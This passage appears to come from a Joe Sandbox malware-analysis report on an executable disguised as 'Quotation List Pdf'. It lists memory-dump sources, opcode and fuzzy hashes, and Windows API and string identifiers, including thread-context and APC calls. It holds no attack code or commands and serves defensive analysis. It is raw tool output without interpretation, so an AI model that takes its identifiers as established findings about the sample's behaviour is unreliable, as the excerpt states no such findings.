                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 28436a9c3417000466a2d9979135604bb1afaa64b481e814e6aa6ec24cae149b
                                                      • Instruction ID: ea5b5b57155e40c94f2c780ac2efd2e8776000cf9c7e800cd64504f5ed257723
                                                      • Opcode Fuzzy Hash: 28436a9c3417000466a2d9979135604bb1afaa64b481e814e6aa6ec24cae149b
                                                      • Instruction Fuzzy Hash: 88C1C472A18B86C1EA00AF15E814178FBA6FF44BA4F854636C96D577D6CF3CE090C368
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86c9ebb636796ca0e2a1abc168f63624881ec9cfa17a1a52ac6cfbaa34e87d82
                                                      • Instruction ID: 978085aaf2df43bbaba28a04a74b4f327c2602a2347cd8dc67fb4235a9faadf4
                                                      • Opcode Fuzzy Hash: 86c9ebb636796ca0e2a1abc168f63624881ec9cfa17a1a52ac6cfbaa34e87d82
                                                      • Instruction Fuzzy Hash: CA9100B3A10B5587DB18DF2AD841268BBA0FB54BE8F505239CE6D43B98DF38D911CB40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d0bef39161097e9df54091f6f8947ac5f1bb2ebaed7a10930231bbe4d97c59e0
                                                      • Instruction ID: c8c7164ffe0f120dec217bb1bc09d89e3ca78e6ca6cb16987b3d636b6c1c4ff6
                                                      • Opcode Fuzzy Hash: d0bef39161097e9df54091f6f8947ac5f1bb2ebaed7a10930231bbe4d97c59e0
                                                      • Instruction Fuzzy Hash: 9341C5A1E19882DAEA14BF63ED411F9DA506F94FC0FC44031ED0D97797ED2CEA0183A8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4cfc7e4d115ce1370a28ac6abb2cf91c2911c6ad5a29bc3d3fae3187189239e
                                                      • Instruction ID: b12169b1eea90c735a298abf3a0bee3949456d292ecc0226a3c3ae9f8622c809
                                                      • Opcode Fuzzy Hash: c4cfc7e4d115ce1370a28ac6abb2cf91c2911c6ad5a29bc3d3fae3187189239e
                                                      • Instruction Fuzzy Hash: A3412951F28B4AC1E905AF379641234D943EF6A3D0EACCB31D81D367E5EF2D70885214
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee72cb688372a8b7ca6c53026427fe1cb6e98e11cf675aa8f3c1fed9b58c5e49
                                                      • Instruction ID: b735b7cd65269d7ee6a76a3eaf0d74f8ac00a349f73fa92730d3c914556be139
                                                      • Opcode Fuzzy Hash: ee72cb688372a8b7ca6c53026427fe1cb6e98e11cf675aa8f3c1fed9b58c5e49
                                                      • Instruction Fuzzy Hash: AC413721F16B4981EA159F7AA00197DDA52AF89BC4F9CC732DE0E27790EF3CF0818615
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7533faf894bf0ca9caf5f1480e5f2de4d9b878ab499b8342825ab4e25c589ece
                                                      • Instruction ID: ac5d465f0deade67ef6c179514259899e2eef5ca56dba00e8d8ba94603c6c5ec
                                                      • Opcode Fuzzy Hash: 7533faf894bf0ca9caf5f1480e5f2de4d9b878ab499b8342825ab4e25c589ece
                                                      • Instruction Fuzzy Hash: E531A473F09545C2EA58AF16D4911BCE652AF85BC4FDC9039CE0D07395DE2CEC928729
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 58f6a76dfd64ef7b78e5c6641dc319f4b652810589be1d7a6d8d44123e559c2a
                                                      • Instruction ID: 934b829c999d6931824a9a8009a7d65ad9d9e43a341360e39c44ef3e8ead1230
                                                      • Opcode Fuzzy Hash: 58f6a76dfd64ef7b78e5c6641dc319f4b652810589be1d7a6d8d44123e559c2a
                                                      • Instruction Fuzzy Hash: 1321FC62B2875292FBB4AF39A29567ED751EF8D780F886130DE0C03E46DD2CD5C18A08
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFailFastRaise$Sleep
                                                      • String ID:
                                                      • API String ID: 3706814929-0
                                                      • Opcode ID: b4f4eecb476bf04b12e31564723069907bbc9b466724c713cfc222d08a9c6718
                                                      • Instruction ID: 3d56176418b86fabc8e7620ec6f4099a630f296baa2dae0f581e6bd4818b7ed8
                                                      • Opcode Fuzzy Hash: b4f4eecb476bf04b12e31564723069907bbc9b466724c713cfc222d08a9c6718
                                                      • Instruction Fuzzy Hash: 3A21F232B28546C2FB20AF5AE450BAAEA11EFC4784F844035EF4E42A98ED3CD005C718
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
                                                      • String ID: IsWow64Process2$QueueUserAPC2$kernel32
                                                      • API String ID: 2652322181-269241671
                                                      • Opcode ID: 2ed5142675b828450414f6af03e9e150d3f22da0891d8269898bcd82b2a367be
                                                      • Instruction ID: 3b121b61d90712d5a2923a40a02347d3b1fe276b6ade34395dfd6f4e0acf078d
                                                      • Opcode Fuzzy Hash: 2ed5142675b828450414f6af03e9e150d3f22da0891d8269898bcd82b2a367be
                                                      • Instruction Fuzzy Hash: 2B519130A08A42C2EB60EF12E8543B9E7A1EF84BD4F844235D95D47795EF3CD406CB68
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
                                                      • String ID: IsWow64Process2$QueueUserAPC2$kernel32
                                                      • API String ID: 2652322181-269241671
                                                      • Opcode ID: 4825748d57e2d133e0b0926e79e8171601229c5e1e52b9d54749e5c96503095b
                                                      • Instruction ID: 6d5d34e72a6515e350fcf8ee9b2a85128cb18f9d73c6d744b2286dfe0509b190
                                                      • Opcode Fuzzy Hash: 4825748d57e2d133e0b0926e79e8171601229c5e1e52b9d54749e5c96503095b
                                                      • Instruction Fuzzy Hash: 56519130A08A42C2EB60EF12E8543B9E7A1EF88BC4F844135D94D47795EF3CD406CB68
                                                      APIs
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DC0E
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DC36
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DC56
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DC76
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DC96
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DCBA
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DCDE
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DD02
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
                                                      • API String ID: 1004003707-945519297
                                                      • Opcode ID: a2420435b7c8d9abb28f4f8f1ce3c06c939d7a2a25c3777b265420f1345e2620
                                                      • Instruction ID: 7f77bc0a8dc498c0b9e10c34083b2b1192301e04ab799cb3dcb54bd7cf568111
                                                      • Opcode Fuzzy Hash: a2420435b7c8d9abb28f4f8f1ce3c06c939d7a2a25c3777b265420f1345e2620
                                                      • Instruction Fuzzy Hash: 7F413E60E08652C1EA50BF16E541275DB62AF457F4FC44331DA3C57AE6EF6CE8468328
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                      • String ID: InitializeContext2$kernel32.dll
                                                      • API String ID: 4102459504-3117029998
                                                      • Opcode ID: 4faa34e522b81a6922513b62757b9b2305a4d9aa7d62287a7091f890ca87deb6
                                                      • Instruction ID: cc53472af4149e0c0dbc9e4f99b3111504264aaa2d88ca7a0772f6716cb7d328
                                                      • Opcode Fuzzy Hash: 4faa34e522b81a6922513b62757b9b2305a4d9aa7d62287a7091f890ca87deb6
                                                      • Instruction Fuzzy Hash: BE314B31A08B66C2FA10AF96F440279E791AF44BD1F880435DD4D467A5DF7CE846CB68
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                                                      • String ID:
                                                      • API String ID: 510365852-3916222277
                                                      • Opcode ID: e3e0a65bc4f973e40a7d5c75bb7f7f943cf2642b959c91c2dbab2de6d3c60d57
                                                      • Instruction ID: 46376f35eae42228e7cb1b29499817a56a2a58d60b0737485f147cd1065bcef3
                                                      • Opcode Fuzzy Hash: e3e0a65bc4f973e40a7d5c75bb7f7f943cf2642b959c91c2dbab2de6d3c60d57
                                                      • Instruction Fuzzy Hash: F4113972A08B81CADB64EF26E44129AB751EB457B4F940335E6BD0BAD6CF38D5428704
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: 1666322e2a904ac0cf5b3a234637cb36e490dfc74a66e8185ec8efb97d466e7c
                                                      • Instruction ID: b1396aed3a9d12489d0d104fc742f9d532843687595f0014226a5092b74b6f1e
                                                      • Opcode Fuzzy Hash: 1666322e2a904ac0cf5b3a234637cb36e490dfc74a66e8185ec8efb97d466e7c
                                                      • Instruction Fuzzy Hash: 28618E61A0DB86C5FA50AF15E8402B5FBA1FF48B84FD80931D94D5336ADF3CE48583A8
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: b21c72c450b463f4920cee275832f193dea19a1ca35f9c4e2b50207979d5093b
                                                      • Instruction ID: 3c7945f53ddd4ce7cf8573ba529690c26e566f320739d943587cba1a3cc2557a
                                                      • Opcode Fuzzy Hash: b21c72c450b463f4920cee275832f193dea19a1ca35f9c4e2b50207979d5093b
                                                      • Instruction Fuzzy Hash: 14514D71A0DB86C1EA60AF10E8403B5F7A5FF89744F880536D98D5376ADF3CE0998768
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFailFastRaise
                                                      • String ID: Process is terminating due to StackOverflowException.
                                                      • API String ID: 2546344036-2200901744
                                                      • Opcode ID: edcb76423634533c14701209537ab2eaed2715ea9f1ac3b1dd4543dc0ac9788a
                                                      • Instruction ID: 53208ed83f2538c3b9c8e465ebed8ddde3c8a48e5b377b72f9162ce8f25d4102
                                                      • Opcode Fuzzy Hash: edcb76423634533c14701209537ab2eaed2715ea9f1ac3b1dd4543dc0ac9788a
                                                      • Instruction Fuzzy Hash: 5F519631B08642C2EE60AF16E4403B8E7A1EF58BD4FC44131DA1E477A5DF2EE8958318
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: SwitchThread
                                                      • String ID:
                                                      • API String ID: 115865932-0
                                                      • Opcode ID: 95544bbce4b90e12acf5c392e48b6c2ca22bac221c7c535adcad6349c9bd3327
                                                      • Instruction ID: a811e148a0f195096cd7dc69e19b122fd619beb8620119b3dd07902e1b6b43c3
                                                      • Opcode Fuzzy Hash: 95544bbce4b90e12acf5c392e48b6c2ca22bac221c7c535adcad6349c9bd3327
                                                      • Instruction Fuzzy Hash: A941A432B09746C5EBA09E25D150679FBA0EF41BD8F98813ACB4E467C9DE3CE441C768
                                                      APIs
                                                      • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF768433541), ref: 00007FF76843CD44
                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF768433541), ref: 00007FF76843CD4E
                                                      • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF768433541), ref: 00007FF76843CD6D
                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF768433541), ref: 00007FF76843CD81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastMultipleWait$HandlesObjects
                                                      • String ID:
                                                      • API String ID: 2817213684-0
                                                      • Opcode ID: 71cbba1b383cf0b7fb516053fcd2ddd0c29d4ad2df29a1dc53a75a309a826a29
                                                      • Instruction ID: 60ee0ffe01b84494406654413b630b5b85064874034cb2b48d2b75d16b994555
                                                      • Opcode Fuzzy Hash: 71cbba1b383cf0b7fb516053fcd2ddd0c29d4ad2df29a1dc53a75a309a826a29
                                                      • Instruction Fuzzy Hash: C9117035A0CA65C3D7249B1AF45012AFAA1FF88BD0F940139FA8E47B95CF3CD4008B58
                                                      APIs
                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76849C243), ref: 00007FF76849CF80
                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76849C243), ref: 00007FF76849CFC1
                                                      Strings
                                                      Memory Dump Source
